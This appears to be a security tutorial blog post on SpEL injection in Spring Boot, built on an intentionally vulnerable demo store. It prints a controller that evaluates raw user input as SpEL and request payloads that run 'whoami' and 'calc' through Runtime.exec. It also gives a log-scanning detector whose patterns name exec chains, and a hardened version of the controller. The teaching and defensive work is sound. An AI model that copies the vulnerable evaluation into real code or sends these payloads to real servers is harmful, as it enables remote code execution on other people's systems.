In today’s post, we’re diving deep into a powerful yet often overlooked vulnerability in Spring Boot apps — SpEL Injection. We’ve baked it right into our intentionally vulnerable PinewoodStore app so we can demonstrate how it works and show how it can even lead to Remote Code Execution (RCE). 🔥
🧬 What is Injection?
Injection is a type of security vulnerability where untrusted input is passed to an interpreter or engine, resulting in unintended commands being executed. Classic examples include:
- SQL Injection
- Command Injection
- SpEL Injection
The common factor? User input is treated like code. And that’s dangerous. 🔓
💡 What is SpEL?
SpEL (Spring Expression Language) is a dynamic expression language used across the Spring Framework for querying and manipulating objects at runtime.
You can use SpEL for:
- Accessing bean properties: `#{user.name}`
- Performing logic and math: `#{1 + 2}`
- Calling static methods: `T(java.lang.Math).sqrt(16)`
⚠️ What is SpEL Injection?
SpEL Injection happens when user-supplied input is evaluated as a SpEL expression, allowing attackers to execute arbitrary code or access sensitive data.
If an endpoint uses something like `SpelExpressionParser` and evaluates raw input — it’s game over.
🧪 Vulnerable Code in PinewoodStore: SpellController.java
Here’s the vulnerable endpoint we’ve added for this demo:
```java
package com.enoch.auth2.controller;

import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/info")
public class SpellController {

    @GetMapping("/security")
    public String evaluate(@RequestParam String expression) {
        System.out.println(expression);
        ExpressionParser parser = new SpelExpressionParser();
        // The raw query parameter is parsed as SpEL and evaluated with the default
        // StandardEvaluationContext, which allows type references, constructors
        // and arbitrary method calls.
        Expression exp = parser.parseExpression(expression);
        return "Result: " + exp.getValue(); // ⚠️ Vulnerable
    }
}
```
This code takes a user-supplied `expression` and evaluates it using `SpelExpressionParser`, with no filtering, no sanitization, and no limits.
🚨 This is the core of SpEL Injection — and it’s wide open in this controller.
🧪 Live Demo: Exploiting SpEL Injection for RCE
Let’s walk through some test payloads to demonstrate how this flaw can be weaponized.
🔍 Test 1: Fetch OS Info
`GET /info/security?expression=T(System).getProperty('os.name')`
➡️ Output: "Result: Windows 11" (or your current OS)
👤 Test 2: Find the Current User
`GET /info/security?expression=new%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()).next()`
➡️ Output: "Result: your-username"
➗ Test 3: Basic Math Evaluation
`GET /info/security?expression=100*5`
➡️ Output: "Result: 500"
💥 Test 4: Remote Code Execution (RCE) – Windows
`GET /info/security?expression=T(java.lang.Runtime).getRuntime().exec('calc')`
➡️ This launches Calculator on a Windows machine — classic proof of RCE.
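The four requests above all leave a trace in the web server's access log, and every code-execution payload relies on SpEL constructs (`T(...)` type references, `new` constructors, `#`/`@` references, `getRuntime`/`exec` chains) that a legitimate arithmetic or property expression never needs. The detector below is an added example, not PinewoodStore's own code: it parses constructed Common-Log-Format-style lines (the log layout and the package `com.enoch.auth2.detect` are assumptions), URL-decodes the `expression` parameter of hits on `/info/security`, and flags the ones carrying those markers.

```java
// Added example, not PinewoodStore's own code. Scans access-log lines (constructed in
// main) for requests to the vulnerable /info/security endpoint whose `expression`
// parameter carries SpEL constructs a legitimate query never needs.
// The log layout and package name are assumptions.
package com.enoch.auth2.detect;

import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class SpelInjectionDetector {

    // SpEL constructs that only matter for code execution or object reach:
    // type references T(...), constructor calls, bean/variable references
    // (@bean, #var), and the Runtime/ProcessBuilder/getClass chains used for RCE.
    private static final Pattern MARKERS = Pattern.compile(
            "\\bT\\s*\\(|\\bnew\\s+[A-Za-z_$][\\w$.]*|[@#][A-Za-z_]\\w*"
            + "|getRuntime|ProcessBuilder|\\.exec\\s*\\(|getClass\\s*\\(");

    // The request part of an access-log line: "<METHOD> <path?query> HTTP/x.y"
    private static final Pattern REQUEST =
            Pattern.compile("\"(?:GET|POST)\\s+(\\S+)\\s+HTTP/[\\d.]+\"");

    private static final String ENDPOINT = "/info/security";
    private static final String PARAM = "expression=";

    /** Decoded `expression` parameter of a hit on the endpoint, or null otherwise. */
    static String extractExpression(String logLine) {
        Matcher m = REQUEST.matcher(logLine);
        if (!m.find()) return null;
        String target = m.group(1);
        int q = target.indexOf('?');
        if (q < 0 || !target.substring(0, q).equals(ENDPOINT)) return null;
        for (String kv : target.substring(q + 1).split("&")) {
            if (kv.startsWith(PARAM)) {
                String raw = kv.substring(PARAM.length());
                try {
                    return URLDecoder.decode(raw, StandardCharsets.UTF_8);
                } catch (IllegalArgumentException malformed) {
                    return raw; // malformed percent-encoding: inspect the raw value instead
                }
            }
        }
        return null;
    }

    static boolean isSuspicious(String expression) {
        return expression != null && MARKERS.matcher(expression).find();
    }

    /** Returns the subset of lines whose expression parameter looks like an injection attempt. */
    static List<String> scan(List<String> logLines) {
        List<String> flagged = new ArrayList<>();
        for (String line : logLines) {
            if (isSuspicious(extractExpression(line))) {
                flagged.add(line);
            }
        }
        return flagged;
    }

    public static void main(String[] args) {
        // Constructed sample lines: the post's four test requests plus an unrelated hit.
        List<String> sample = List.of(
            "10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] \"GET /info/security?expression=100*5 HTTP/1.1\" 200 11",
            "10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] \"GET /info/security?expression=T(System).getProperty('os.name') HTTP/1.1\" 200 19",
            "10.0.0.5 - - [01/Jan/2025:10:00:02 +0000] \"GET /info/security?expression=new%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()).next() HTTP/1.1\" 200 21",
            "10.0.0.5 - - [01/Jan/2025:10:00:03 +0000] \"GET /info/security?expression=T(java.lang.Runtime).getRuntime().exec('calc') HTTP/1.1\" 200 30",
            "10.0.0.7 - - [01/Jan/2025:10:00:04 +0000] \"GET /products?page=2 HTTP/1.1\" 200 5120"
        );
        for (String hit : scan(sample)) {
            System.out.println("SpEL injection attempt: " + hit);
        }
        // Flags the three lines containing T(...) / new ...; 100*5 and /products pass.
    }
}
```

Decoding before matching matters: Test 2 arrives with `%20` in the log, and the `new` keyword is only visible once that is turned back into a space. The marker list is deliberately narrow so that arithmetic like `100*5` or property paths do not trip it; if the endpoint had a legitimate use of `#variables`, that alternative would be the one to drop.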
🧠 Key Terms
| Term | Meaning |
|---|---|
| SpEL | Spring Expression Language for evaluating expressions dynamically |
| Injection | A vulnerability where input is interpreted as code |
| `ExpressionParser` | Spring class that parses and compiles expressions |
| `parseExpression()` | Method that converts a string to executable SpEL |
| `exp.getValue()` | Runs the expression and returns the result |
🔐 How to Prevent SpEL Injection
- ❌ Never pass raw user input to `SpelExpressionParser`.
- ✅ Validate or sanitize input if dynamic logic is needed.
- ✅ Protect such endpoints with authentication and authorization.
- 🔐 Avoid using SpEL altogether in user-facing endpoints unless absolutely necessary.
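If dynamic evaluation genuinely cannot be avoided, the two controls that actually close the hole in `SpellController` are an allowlist on the input and an evaluation context that simply has no way to reach types, constructors or methods. The controller below is an added example, not PinewoodStore's code: `SafeSpellController` and its `ProductView` root object are hypothetical names, and it assumes a Spring Framework version that ships `SimpleEvaluationContext` (4.3.15 / 5.0.5 and later).

```java
// Added example, not part of PinewoodStore: a hardened counterpart to SpellController.
// Assumptions: SafeSpellController and ProductView are hypothetical names, and
// org.springframework.expression.spel.support.SimpleEvaluationContext is available.
package com.enoch.auth2.controller;

import java.util.regex.Pattern;

import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.ParseException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/info")
public class SafeSpellController {

    /** Hypothetical read-only view; the only object an expression may read from. */
    public static class ProductView {
        public String getName() { return "Pinewood Chair"; }
        public int getPrice() { return 120; }
        public int getStock() { return 7; }
    }

    // Layer 1, coarse allowlist: property names, integer literals, arithmetic,
    // comparison and grouping. Dots, quotes, commas, '#' and '@' are rejected, so
    // "T(java.lang.Runtime).getRuntime().exec('calc')" never reaches the parser.
    // Something like "T(System)" still passes this character check, which is
    // exactly why layer 2 exists.
    private static final Pattern ALLOWED =
            Pattern.compile("^[A-Za-z0-9_+\\-*/%<>=! ()]{1,64}$");

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    @GetMapping("/security")
    public String evaluate(@RequestParam String expression) {
        return evaluateSafely(expression);
    }

    static String evaluateSafely(String expression) {
        if (!ALLOWED.matcher(expression).matches()) {
            return "Rejected: expression contains disallowed characters";
        }
        // Layer 2: SimpleEvaluationContext.forReadOnlyDataBinding() has no
        // TypeLocator, no ConstructorResolver and no MethodResolver, so T(...),
        // new ... and any method call fail at evaluation time even if layer 1
        // is bypassed. Only public getters on the root object are reachable.
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        try {
            Object value = PARSER.parseExpression(expression).getValue(ctx, new ProductView());
            return "Result: " + value;
        } catch (ParseException | EvaluationException e) {
            // Do not echo e.getMessage(): it reveals parser and class-path details.
            return "Rejected: expression could not be evaluated";
        }
    }
}
```

With this in place, `evaluateSafely("price * stock")` returns `Result: 840` and `evaluateSafely("100*5")` returns `Result: 500`, while `evaluateSafely("T(System)")` is rejected by the context (the type locator throws a `SpelEvaluationException`) and the Test 2 and Test 4 payloads are rejected before parsing. The regex alone is not the control; the context is, and the two together leave an attacker with nothing but arithmetic over three getters.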
💬 Final Thoughts
SpEL Injection is real, dangerous, and easy to overlook. With just one line of unsafe evaluation, you give attackers full control of the backend. Our PinewoodStore intentionally leaves this door open to demonstrate how attackers can walk right through it.
🔍 In real-world apps, a tiny misuse like this could compromise entire systems.
We’ll continue adding more attack vectors like this to PinewoodStore to help developers learn how to find, exploit, and fix modern security flaws.